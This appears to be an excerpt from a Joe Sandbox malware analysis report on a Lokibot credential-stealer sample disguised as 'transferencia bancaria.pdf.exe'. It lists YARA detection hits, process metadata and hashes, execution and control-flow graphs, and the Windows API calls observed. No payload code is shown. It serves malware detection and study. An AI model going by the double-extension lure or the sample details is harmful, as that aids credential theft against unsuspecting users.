                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Target ID:1
                                      Start time:12:29:59
                                      Start date:03/11/2022
                                      Path:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      Imagebase:0x5f0000
                                      File size:811008 bytes
                                      MD5 hash:355EFB2E1F7DD361F8E7CDA449A45EAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000000.275125166.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.513741442.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      Reputation:low

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:10.3%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:3.4%
                                        Total number of Nodes:87
                                        Total number of Limit Nodes:8
                                        execution_graph 10886 31a43c8 10887 31a43c9 10886->10887 10888 31a43e6 10887->10888 10892 31a44d8 10887->10892 10898 31a3b98 10888->10898 10890 31a4405 10893 31a44e2 10892->10893 10895 31a4537 10892->10895 10902 31a45d8 10893->10902 10906 31a45c9 10893->10906 10895->10888 10899 31a3ba3 10898->10899 10914 31a5b94 10899->10914 10901 31a6de4 10901->10890 10903 31a45d9 10902->10903 10904 31a46dc 10903->10904 10910 31a4198 10903->10910 10908 31a45cc 10906->10908 10907 31a46dc 10907->10907 10908->10907 10909 31a4198 CreateActCtxA 10908->10909 10909->10907 10911 31a5668 CreateActCtxA 10910->10911 10913 31a572b 10911->10913 10915 31a5b9f 10914->10915 10918 31a718c 10915->10918 10917 31a7625 10917->10901 10919 31a7197 10918->10919 10922 31a71bc 10919->10922 10921 31a7702 10921->10917 10923 31a71c7 10922->10923 10926 31a71ec 10923->10926 10925 31a7802 10925->10921 10927 31a71f7 10926->10927 10928 31a7f5c 10927->10928 10930 31abe18 10927->10930 10928->10925 10931 31abe1c 10930->10931 10932 31abe6d 10931->10932 10934 31abfd8 10931->10934 10932->10928 10935 31abfe5 10934->10935 10937 31ac01f 10935->10937 10938 31aab0c 10935->10938 10937->10932 10939 31aab17 10938->10939 10941 31acd18 10939->10941 10942 31ac324 10939->10942 10943 31ac32f 10942->10943 10944 31a71ec 2 API calls 10943->10944 10945 31acd87 10944->10945 10949 31aeb10 10945->10949 10954 31aeaf8 10945->10954 10946 31acdc0 10946->10941 10950 31aeb11 10949->10950 10951 31aeb4d 10950->10951 10952 31aef8b LoadLibraryExW GetModuleHandleW 10950->10952 10953 31aef90 LoadLibraryExW GetModuleHandleW 10950->10953 10951->10946 10952->10951 10953->10951 10955 31aeadb 10954->10955 10956 31aeb0a 10954->10956 10955->10946 10957 31aeb4d 10956->10957 10958 31aef8b LoadLibraryExW GetModuleHandleW 10956->10958 10959 31aef90 LoadLibraryExW GetModuleHandleW 10956->10959 10957->10946 10958->10957 10959->10957 10960 31a9d10 10963 31a9e08 10960->10963 10961 31a9d1f 10964 31a9e1b 10963->10964 10965 31a9e33 10964->10965 10971 31aa090 10964->10971 10975 31aa080 10964->10975 10965->10961 10966 31a9e2b 10966->10965 10967 31aa030 GetModuleHandleW 10966->10967 10968 31aa05d 10967->10968 10968->10961 10972 31aa095 10971->10972 10974 31aa0c9 10972->10974 10979 31a9188 10972->10979 10974->10966 10976 31aa090 10975->10976 10977 31aa0c9 10976->10977 10978 31a9188 LoadLibraryExW 10976->10978 10977->10966 10978->10977 10980 31aa270 LoadLibraryExW 10979->10980 10982 31aa2e9 10980->10982 10982->10974 10983 31ac720 10984 31ac721 DuplicateHandle 10983->10984 10985 31ac7b6 10984->10985 10986 31ac0f0 10987 31ac0f1 GetCurrentProcess 10986->10987 10988 31ac16a GetCurrentThread 10987->10988 10989 31ac163 10987->10989 10990 31ac1a0 10988->10990 10991 31ac1a7 GetCurrentProcess 10988->10991 10989->10988 10990->10991 10994 31ac1dd 10991->10994 10992 31ac205 GetCurrentThreadId 10993 31ac236 10992->10993 10994->10992

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 472 31a6cd0-31a6cd8 473 31a6cda 472->473 474 31a6d43-31a6d58 472->474 475 31a6cdc-31a6cdf 473->475 476 31a6ce1-31a6cf0 473->476 480 31a6d5a 474->480 481 31a6d5f-31a6dc7 474->481 475->476 478 31a6cf2 476->478 479 31a6cf7-31a6d1e 476->479 478->479 479->474 480->481 489 31a6dd1-31a6de9 call 31a5b94 call 31a5ba4 481->489 493 31a6dee-31a6ef2 489->493 500 31a6efd-31a6f18 call 31a5bb4 493->500 502 31a6f1d-31a7103 call 31a5bb4 * 2 call 31a5bc4 500->502 525 31a712d 502->525 526 31a7105-31a7111 502->526 529 31a7133-31a7145 525->529 527 31a711b-31a7121 526->527 528 31a7113-31a7119 526->528 530 31a712b 527->530 528->530 531 31a714c-31a7169 529->531 530->529 532 31a7170-31a717e 531->532
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `Ql
                                        • API String ID: 0-2088864798
                                        • Opcode ID: 2c4ee5c2f6c2c0d1cd93bf5c04e4114fdecdf5e179f271f28071e8fdde8bbfb2
                                        • Instruction ID: 48232a68e43296038bad330b2fd9b4358c9edf6ceb887847f2b40b7641d5be0b
                                        • Opcode Fuzzy Hash: 2c4ee5c2f6c2c0d1cd93bf5c04e4114fdecdf5e179f271f28071e8fdde8bbfb2
                                        • Instruction Fuzzy Hash: 95D11334E10619CBDB24DFA8C840BDDB7B2FF89305F6182A9D549BB250EB306A85CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6854b299633bf7d808f20d1b11e7d246de59232e38bb0552422df8302c8e5f61
                                        • Instruction ID: aae2ed0ef4ab63f45413a17e40a1d2fee20b7d789405687bf72db19b5e49d64c
                                        • Opcode Fuzzy Hash: 6854b299633bf7d808f20d1b11e7d246de59232e38bb0552422df8302c8e5f61
                                        • Instruction Fuzzy Hash: 36B1292715C9C2EBC711D67E8C43996BBB0965F131B48C39692F08B7E2E7A2C452CB46
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f28b98fd1eaafcfc60ed9455fd1f7dfa0b19e23a001444180cca7116c974e4f
                                        • Instruction ID: 8f36b4848297e641811ea6f927f54a755be5ba3ab8897776d11cafae44913c76
                                        • Opcode Fuzzy Hash: 2f28b98fd1eaafcfc60ed9455fd1f7dfa0b19e23a001444180cca7116c974e4f
                                        • Instruction Fuzzy Hash: 1ED11334E10219CBDB24DBA8C850BDDB7B2FF99301F6182A9D549BB350EB306A85CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4df12ad0fcef5f0221100e220efa53c7c91e21eed7aaf78e17666e8a453d4911
                                        • Instruction ID: 7e247d06fb1514037e42a2dd102c8531d4f584ab0efb63378f92d70c11ab7dee
                                        • Opcode Fuzzy Hash: 4df12ad0fcef5f0221100e220efa53c7c91e21eed7aaf78e17666e8a453d4911
                                        • Instruction Fuzzy Hash: 6FD10334E10619CBDB24DBA8C840BDDB7B2FF99301F6182A9D549BB351EB306A85CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 031AC150
                                        • GetCurrentThread.KERNEL32 ref: 031AC18D
                                        • GetCurrentProcess.KERNEL32 ref: 031AC1CA
                                        • GetCurrentThreadId.KERNEL32 ref: 031AC223
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: d8378a1ac8aeb23e5cb3495ca1b98887c32514b29190ebea29ff4b771900a226
                                        • Instruction ID: 7ec16e6d37f9d1fa6b84422ccc6bd21693455cb4040153afad34c204843f4ce5
                                        • Opcode Fuzzy Hash: d8378a1ac8aeb23e5cb3495ca1b98887c32514b29190ebea29ff4b771900a226
                                        • Instruction Fuzzy Hash: FE5145B4A006498FDB10CFA9C548BDEBBF1FB88314F248459E419B7360D7349944CFA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 031AC150
                                        • GetCurrentThread.KERNEL32 ref: 031AC18D
                                        • GetCurrentProcess.KERNEL32 ref: 031AC1CA
                                        • GetCurrentThreadId.KERNEL32 ref: 031AC223
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: b0dca8b228629f53ebec9cc3e1727159bbfe64d5babccf26c59b0cfb35d4d083
                                        • Instruction ID: 90f74a74ae7efb02d33a580c50b3623f06c57ae78b7978647bdb757c71f19378
                                        • Opcode Fuzzy Hash: b0dca8b228629f53ebec9cc3e1727159bbfe64d5babccf26c59b0cfb35d4d083
                                        • Instruction Fuzzy Hash: 085142B4A006498FDB14CFA9D948BDEBBF1FB88314F248459E419B7360D734A944CFA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 338 31a9e08-31a9e1d call 31a7c74 341 31a9e1f 338->341 342 31a9e33-31a9e37 338->342 393 31a9e25 call 31aa090 341->393 394 31a9e25 call 31aa080 341->394 343 31a9e4b-31a9e8c 342->343 344 31a9e39-31a9e43 342->344 349 31a9e99-31a9ea7 343->349 350 31a9e8e-31a9e96 343->350 344->343 345 31a9e2b-31a9e2d 345->342 348 31a9f68-31a9fe2 345->348 386 31a9fe9-31aa028 348->386 387 31a9fe4-31a9fe7 348->387 352 31a9ecb-31a9ecd 349->352 353 31a9ea9-31a9eae 349->353 350->349 356 31a9ed0-31a9ed7 352->356 354 31a9eb9 353->354 355 31a9eb0-31a9eb7 call 31a912c 353->355 359 31a9ebb-31a9ec9 354->359 355->359 360 31a9ed9-31a9ee1 356->360 361 31a9ee4-31a9eeb 356->361 359->356 360->361 362 31a9ef8-31a9f01 call 31a913c 361->362 363 31a9eed-31a9ef5 361->363 368 31a9f0e-31a9f13 362->368 369 31a9f03-31a9f0b 362->369 363->362 371 31a9f31-31a9f3e 368->371 372 31a9f15-31a9f1c 368->372 369->368 377 31a9f40-31a9f5e 371->377 378 31a9f61-31a9f67 371->378 372->371 373 31a9f1e-31a9f2e call 31a914c call 31a915c 372->373 373->371 377->378 388 31aa02a-31aa02d 386->388 389 31aa030-31aa05b GetModuleHandleW 386->389 387->386 388->389 390 31aa05d-31aa063 389->390 391 31aa064-31aa078 389->391 390->391 393->345 394->345
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 031AA04E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: d2fbcd8a9b3bebbe01e2e3d97e4b96947622484a4291a71df20f65bb9f626e4b
                                        • Instruction ID: a2b2b7b0fc3c54449a54b170d8d198aa059ecc4982bb49f6c5b3fd16f4638275
                                        • Opcode Fuzzy Hash: d2fbcd8a9b3bebbe01e2e3d97e4b96947622484a4291a71df20f65bb9f626e4b
                                        • Instruction Fuzzy Hash: D67137B4A00B098FDB24DF2AC044B5ABBF5BF88215F04892DD54ADBB50D735E855CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 395 31a565d-31a565e 396 31a5660-31a5662 395->396 397 31a5665-31a5666 395->397 398 31a5669-31a566c 396->398 399 31a5664 396->399 401 31a566d-31a5729 CreateActCtxA 397->401 402 31a5668 397->402 398->401 399->397 404 31a572b-31a5731 401->404 405 31a5732-31a578c 401->405 402->398 404->405 412 31a579b-31a579f 405->412 413 31a578e-31a5791 405->413 414 31a57b0 412->414 415 31a57a1-31a57ad 412->415 413->412 416 31a57b1 414->416 415->414 416->416
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 031A5719
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 56e088bd1a9ddff054d71cfd54dbaa7b9530e454638048fad8fa92b96242882c
                                        • Instruction ID: 03a55378979b3367d581deb51275fa54732a0781a1877c73ecdfd48185f51540
                                        • Opcode Fuzzy Hash: 56e088bd1a9ddff054d71cfd54dbaa7b9530e454638048fad8fa92b96242882c
                                        • Instruction Fuzzy Hash: 2C4134B4C04A18CFDB24CFA9C884B8EBBB2BF89305F148069D548BB251DB756946CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 418 31a4198-31a5729 CreateActCtxA 423 31a572b-31a5731 418->423 424 31a5732-31a578c 418->424 423->424 431 31a579b-31a579f 424->431 432 31a578e-31a5791 424->432 433 31a57b0 431->433 434 31a57a1-31a57ad 431->434 432->431 435 31a57b1 433->435 434->433 435->435
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 031A5719
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: cce9a6c62aca7a5c4357e521f2ba19d45ab23a5a6fdc2a415592d639e8411010
                                        • Instruction ID: c5a62d73f6b67cf5a9e6e8f33d1d0ca8042b22f233bd0d4c92b259625d094f88
                                        • Opcode Fuzzy Hash: cce9a6c62aca7a5c4357e521f2ba19d45ab23a5a6fdc2a415592d639e8411010
                                        • Instruction Fuzzy Hash: F14121B4C04618CFDB24CFA9C884B8EFBB2BF89309F548069D508BB251DB746945CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 437 31ac718-31ac71a 438 31ac71c 437->438 439 31ac721-31ac7b4 DuplicateHandle 437->439 438->439 440 31ac7bd-31ac7da 439->440 441 31ac7b6-31ac7bc 439->441 441->440
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031AC7A7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 42801ccdea6924ddaf7cace30ef6b5ce19cda96a6de4d244af8d80fda7073f15
                                        • Instruction ID: 0f7b9c499753045c43ba4a1c40adc2417b5ac593ca2b3f678cce75f372359fd6
                                        • Opcode Fuzzy Hash: 42801ccdea6924ddaf7cace30ef6b5ce19cda96a6de4d244af8d80fda7073f15
                                        • Instruction Fuzzy Hash: 3121E0B5D01248AFDB10CFAAD984ADEBBF5FB48324F14841AE915B7310C378A955CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 444 31ac720-31ac7b4 DuplicateHandle 446 31ac7bd-31ac7da 444->446 447 31ac7b6-31ac7bc 444->447 447->446
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031AC7A7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 681d86076cd0bb748edea73648c5b92dc80301f1e77527f325c00aa20baa0621
                                        • Instruction ID: 9e1407801b68f258a043c7462e7b7d1e3d312c7aece4c93dc8e7c761d3498f10
                                        • Opcode Fuzzy Hash: 681d86076cd0bb748edea73648c5b92dc80301f1e77527f325c00aa20baa0621
                                        • Instruction Fuzzy Hash: 4321C2B59012489FDB10CFAAD984ADEFBF8FB48324F14841AE915B7310D378A954CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 450 31a9188-31aa2b0 452 31aa2b8-31aa2e7 LoadLibraryExW 450->452 453 31aa2b2-31aa2b5 450->453 454 31aa2e9-31aa2ef 452->454 455 31aa2f0-31aa30d 452->455 453->452 454->455
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,031AA0C9,00000800,00000000,00000000), ref: 031AA2DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 316f5584bc0a15c2db7e00265af0f1628d90990c6ba3f401e10eee1d860955f9
                                        • Instruction ID: 2233120b0c59f417ecda42c368e7bcc91a4f44199206531b4ab849c3e66a541e
                                        • Opcode Fuzzy Hash: 316f5584bc0a15c2db7e00265af0f1628d90990c6ba3f401e10eee1d860955f9
                                        • Instruction Fuzzy Hash: 7D1100B69046098FCB10CFAAC484BDEFBF4EB88320F05842EE519B7200C375A955CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 458 31aa268-31aa2b0 459 31aa2b8-31aa2e7 LoadLibraryExW 458->459 460 31aa2b2-31aa2b5 458->460 461 31aa2e9-31aa2ef 459->461 462 31aa2f0-31aa30d 459->462 460->459 461->462
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,031AA0C9,00000800,00000000,00000000), ref: 031AA2DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: fc78a907a7b1b47a5ef488c3f3d1119fa8838bb3bdf2be4a8c864340e1deb12d
                                        • Instruction ID: 870825ece008c271c148440cb7adad6c2b4ed808bf44672ec6584d8f60cdd7da
                                        • Opcode Fuzzy Hash: fc78a907a7b1b47a5ef488c3f3d1119fa8838bb3bdf2be4a8c864340e1deb12d
                                        • Instruction Fuzzy Hash: E41103B6D002498FDB10CF9AD484ADEFBF4AB88314F04845ED819B7600C375A959CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 465 31a9fe8-31aa028 467 31aa02a-31aa02d 465->467 468 31aa030-31aa05b GetModuleHandleW 465->468 467->468 469 31aa05d-31aa063 468->469 470 31aa064-31aa078 468->470 469->470
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 031AA04E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 48a61701ab8aed34e4ba74e70437b976179149a3cc52685b29a96fbdfa8d3ae3
                                        • Instruction ID: 635c64a91ae933f8e86676fb555c2bf3985eb2c5a91ec260698436c224b95015
                                        • Opcode Fuzzy Hash: 48a61701ab8aed34e4ba74e70437b976179149a3cc52685b29a96fbdfa8d3ae3
                                        • Instruction Fuzzy Hash: D411DFB6C006498FCB10CF9AC544BDEFBF4AF88224F15841AD429B7600D379A546CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277369160.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_306d000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21e5e9ea0d704d7fcc10d932013f651b3cacd398593b2ff2d5756cbda496b1a3
                                        • Instruction ID: 87adf02bcef4b026e440071ffa256a52e77794ba2346c3a47096280a9e67b83d
                                        • Opcode Fuzzy Hash: 21e5e9ea0d704d7fcc10d932013f651b3cacd398593b2ff2d5756cbda496b1a3
                                        • Instruction Fuzzy Hash: 77213AB1604241DFDF05DF10D8C4F2ABBA5FB98314F24C5A9ED064B20AC336D856CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277423429.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_307d000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6994197086086c17a8e68b71f8dd0401de19fbe70612b74bf455bf54f5ce594
                                        • Instruction ID: c8580d32b90f69fc3b1cebee8eb248984847e5bf4c9332c92720baf830e6a618
                                        • Opcode Fuzzy Hash: a6994197086086c17a8e68b71f8dd0401de19fbe70612b74bf455bf54f5ce594
                                        • Instruction Fuzzy Hash: 9E210775A04244EFDB05DF10D9C0B26BBA5FF84314F24C9ADE9094B246C336D847CA61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277423429.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_307d000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8968000e6a0d0fdbcf373d6a0eb466a27d47798979dcc17107c98477ad452c0e
                                        • Instruction ID: ee704c95e28f878ca8f9aca81f2d31c99f89455779bab4bdd41be42cbedf0c3b
                                        • Opcode Fuzzy Hash: 8968000e6a0d0fdbcf373d6a0eb466a27d47798979dcc17107c98477ad452c0e
                                        • Instruction Fuzzy Hash: CD210775A04244DFDB14DF10D9C4B26BBA5FF84314F24C9ADD9094B246C33AD847CAE2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277423429.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_307d000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12e4e74479fbbde4ba5b81e36311d962de63eda1d054b1b7ad3786d54bd39092
                                        • Instruction ID: a453508f714572aaaa93bdff6e45fa8dc71aade053b21fdc8d4df85bf209b827
                                        • Opcode Fuzzy Hash: 12e4e74479fbbde4ba5b81e36311d962de63eda1d054b1b7ad3786d54bd39092
                                        • Instruction Fuzzy Hash: C32162755093808FCB12CF24D994B15BFB1EF46214F28C5DAD8498B657C33AD85ACBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277369160.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_306d000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 738f38a92942b39438876c6a1553cd0bccb815d4d18169b4d3f22ead1c19c600
                                        • Instruction ID: 09e12f16639bc9d826a8a46d9aa6e816ae7f9d6bd73f6d72f84f6c1ddb7333ed
                                        • Opcode Fuzzy Hash: 738f38a92942b39438876c6a1553cd0bccb815d4d18169b4d3f22ead1c19c600
                                        • Instruction Fuzzy Hash: 8921AF76504281DFCB16CF10D9C4B56BFB2FB88314F28C6AADC050B65AC33AD466CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.277423429.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_307d000_transferencia bancaria.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d58ca62981777cd3cbf56bb22269b8e21f4586939eb6954d17036f4794f2a560
                                        • Instruction ID: 82efccde932e3857c5941a4e3a7ccda82ede1b0450c4bd720ec0a6f02d633744
                                        • Opcode Fuzzy Hash: d58ca62981777cd3cbf56bb22269b8e21f4586939eb6954d17036f4794f2a560
